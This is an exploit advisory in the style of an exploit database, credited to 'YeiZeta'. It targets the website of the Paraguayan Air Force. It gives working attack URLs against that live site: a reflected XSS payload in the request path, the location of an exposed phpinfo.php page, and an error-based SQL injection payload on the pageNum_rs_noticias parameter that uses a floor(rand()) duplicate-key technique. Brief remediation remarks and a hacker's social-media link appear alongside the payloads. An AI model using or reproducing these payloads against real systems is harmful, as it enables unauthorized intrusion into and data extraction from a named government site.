######################Exploit#######################
# Exploit Title: SQL/XSS/phpinfo() Fuerza Aérea Paraguaya
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################
XSS (reflected, via the request path after index.php; output there should be HTML-encoded)
http://www.fuerzaaerea.mil.py/index.php/%22ns=%22theJoker(0x000136)%22%3E%3Ch1%3EXSS%20DETECT%20BY%20YEI%20ZETA%3C/h1%3E
phpinfo() page exposed (information disclosure; the file should be removed or access-restricted)
http://www.fuerzaaerea.mil.py/phpinfo.php
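SQL injection (pageNum_rs_noticias parameter; the value should be validated as an integer and bound as a query parameter)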
http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1
http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&totalRows_rs_noticias=83&cod=index
##############################################
https://www.facebook.com/TheJokerHack
##############################################
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.